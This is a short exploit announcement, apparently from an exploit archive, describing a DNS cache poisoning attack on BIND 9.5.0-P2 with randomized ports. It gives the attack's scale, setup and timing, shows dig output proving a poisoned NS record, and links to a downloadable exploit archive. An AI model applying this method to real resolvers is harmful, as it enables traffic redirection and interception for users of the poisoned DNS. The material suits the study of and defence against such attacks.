BIND 9.5.0-P2 (randomized ports) Remote DNS Cache Poisoning Exploit

1. Successfully poisoned the latest BIND with fully randomized ports!
3. Exploit required to send more than 130 thousand of requests for the fake records like 
4. 131737-4795-15081.blah.com to be able to match port and ID and insert poisoned entry 
5. for the poisoned_dns.blah.com.
7. # dig @localhost www.blah.com +norecurse
9. ; <<>> DiG 9.5.0-P2 <<>> @localhost www.blah.com +norecurse
10. ; (1 server found)
11. ;; global options:  printcmd
12. ;; Got answer:
13. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6950
14. ;; flags: qr ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
16. ;; QUESTION SECTION:
17. ;www.blah.com.                  IN      A
19. ;; AUTHORITY SECTION:
20. www.blah.com.           73557   IN      NS      poisoned_dns.blah.com.
22. ;; ADDITIONAL SECTION:
23. poisoned_dns.blah.com.  73557   IN      A       1.2.3.4
25. # named -v
26. BIND 9.5.0-P2
28. BIND used fully randomized source port range, i.e. around 64000 ports. 
29. Two attacking servers, connected to the attacked one via GigE link, were used, 
30. each one attacked 1-2 ports with full ID range. Usually attacking server is able 
31. to send about 40-50 thousands fake replies before remote server returns the 
32. correct one, so if port was matched probability of the successful poisoning is more than 60%.
34. Attack took about half of the day, i.e. a bit less than 10 hours.
35. So, if you have a GigE lan, any trojaned machine can poison your DNS during one night... 
37. original source: http://tservice.net.ru/~s0mbre/blog/2008/08/08/
39. http://milw0rm.com/sploits/2008-dns-bind.tgz